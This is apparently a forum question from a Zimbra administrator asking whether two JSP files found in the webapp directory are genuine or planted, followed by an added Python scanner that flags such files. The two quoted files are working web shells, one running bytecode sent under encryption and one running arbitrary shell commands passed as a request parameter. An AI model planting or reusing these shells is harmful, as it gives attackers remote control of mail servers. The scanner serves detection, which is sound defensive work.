Are these files Zimbra files or scripts created by a hacker?
/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp and the content of it is:
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(
pageContext);%>
/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp and the content is:
<%if("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>
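
A triage heuristic built from the traits visible in the two files quoted above (added example, not part of the original post and not Zimbra code): it flags JSP files that pass a request parameter to `exec`, or that define and instantiate classes through a custom `ClassLoader`. The trait names, function names and verdict labels are assumptions of this example, and a hit means the file needs manual review.

```python
import os
import re
import sys

# Traits taken from the two JSP files quoted in the post above.
TRAITS = {
    "exec_from_request": re.compile(r"\.exec\s*\([^;]*request\.getParameter", re.S),
    "custom_classloader": re.compile(r"extends\s+ClassLoader"),
    "define_class": re.compile(r"defineClass\s*\("),
    "cipher_init": re.compile(r"Cipher\.getInstance\s*\("),
    "base64_decode": re.compile(r"BASE64Decoder|Base64\.getDecoder"),
    "reflective_new_instance": re.compile(r"\.newInstance\s*\("),
}

def match_traits(jsp_source):
    """Return the sorted names of the traits found in one JSP source string."""
    return sorted(name for name, rx in TRAITS.items() if rx.search(jsp_source))

def verdict(traits):
    """Classify a trait list: command shell, class-loading shell, or nothing."""
    found = set(traits)
    if "exec_from_request" in found:
        return "command-shell"
    if {"custom_classloader", "define_class", "reflective_new_instance"} <= found:
        return "class-loader-shell"
    return "no-match"

def scan_tree(root):
    """Walk root and return (path, verdict, traits) for every flagged JSP file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".jsp", ".jspx")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    traits = match_traits(fh.read())
            except OSError:
                continue  # unreadable file: skip, do not abort the sweep
            if verdict(traits) != "no-match":
                hits.append((path, verdict(traits), traits))
    return hits

if __name__ == "__main__":
    # Default root is the webapp directory named in the post.
    root = sys.argv[1] if len(sys.argv) > 1 else "/opt/zimbra/jetty/webapps/zimbra"
    for path, kind, traits in scan_tree(root):
        print(f"{kind}\t{path}\t{','.join(traits)}")
```

Run it with the webapp directory as the only argument; each output line gives the verdict, the file path and the traits that matched.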